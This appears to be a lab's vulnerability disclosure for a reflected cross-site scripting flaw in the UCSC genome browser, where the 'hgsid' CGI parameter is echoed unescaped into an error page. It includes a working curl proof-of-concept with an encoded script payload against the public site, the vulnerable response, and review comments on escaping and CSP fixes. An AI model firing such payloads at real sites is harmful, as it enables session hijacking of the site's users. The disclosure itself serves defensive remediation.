Our lab is running a local installation of the genome browser and our security dept. has identified a vulnerability in the browser's code. The issue is that CGI input (for example the `hgsid` parameter to hgTracks or hgGateway) is not sanitized or HTML-escaped before being echoed back in an error page, which leads to reflected cross-site scripting: a crafted link runs attacker-chosen JavaScript in the site's origin, i.e. with access to the victim's session. For example:
$ curl 'https://genome.ucsc.edu/cgi-bin/hgTracks?hgsid=%27%22()%26%25%3Cacv%3E%3CScRiPt%20%3Eprompt(911920)%3C/ScRiPt%3E'
<HTML><HEAD>
<TITLE>Very Early Error</TITLE>
<META http-equiv="Content-Script-Type" content="text/javascript">
<link rel='stylesheet' href='../style/HGStyle-v338.css' type='text/css'>
<!-- NOTE(review): no Content-Security-Policy meta tag is present in this markup (response headers are not shown in the transcript, so a header-delivered policy cannot be ruled out from here). A CSP restricting script-src would be a defence-in-depth layer against the reflected script below, but this page itself relies on an inline script and an inline onclick handler, so those would need nonces or refactoring first; HTML-escaping the echoed value is the primary fix. -->
</HEAD>
<BODY CLASS="hgTracks cgi">
<script type='text/javascript'>
// Injects the (initially hidden) warning box markup that showWarnBox/hideWarnBox operate on.
// The markup is a fixed string, so this document.write does not itself reflect request input.
document.write("<center><div id='warnBox' style='display:none;'><CENTER><B id='warnHead'></B></CENTER><UL id='warnList'></UL><CENTER><button id='warnOK' onclick='hideWarnBox();return false;'></button></CENTER></div></center>");
// Reveals the warning box, labels it, and scrolls to the top of the page.
// (The window.scrollTo call is split across two lines in this transcript; that is a
// mail line-wrap between tokens and does not change the JavaScript.)
function showWarnBox() {document.getElementById('warnOK').innerHTML=' OK ';var warnBox=document.getElementById('warnBox');warnBox.style.display=''; warnBox.style.width='65%';document.getElementById('warnHead').innerHTML='Warning/Error(s):';window.scrollTo(0,
0);}
// Hides and empties the warning box, then inspects the last 20 characters of the body's
// innerHTML for an error marker and, if found, navigates back in history.
// NOTE(review): the marker string literal below appears line-wrapped after "--" in this
// transcript; presumably it is a single '-- ERROR --' literal in the served page. Confirm
// against the raw response before treating the wrapped form as the real code.
function hideWarnBox() {var warnBox=document.getElementById('warnBox');warnBox.style.display='none';warnBox.innerHTML='';var endOfPage = document.body.innerHTML.substr(document.body.innerHTML.length-20);if(endOfPage.lastIndexOf('--
ERROR --') > 0) { history.back(); }}
window.onunload = function(){}; // Trick to avoid FF back button issue.
</script>
<!-- HGERROR-START -->
<!-- NOTE(review): this is the XSS sink. The hgsid value from the query string (see the curl URL above) is echoed verbatim inside the error paragraph with no HTML escaping, so the attacker-supplied script element is parsed as markup and will be executed by the browser in this site's origin. The CGI should escape the HTML metacharacters (&lt; &gt; &amp; &quot; &#39;) before embedding the value; the safe rendering of this response would contain &lt;ScRiPt &gt;prompt(911920)&lt;/ScRiPt&gt; as literal text instead of a live script tag. Any other error path that formats request parameters into the page should be audited for the same pattern. -->
<P>invalid unsigned integer: "'"()&%<acv><ScRiPt >prompt(911920)</ScRiPt>"</P>
<!-- HGERROR-END -->
</BODY></HTML>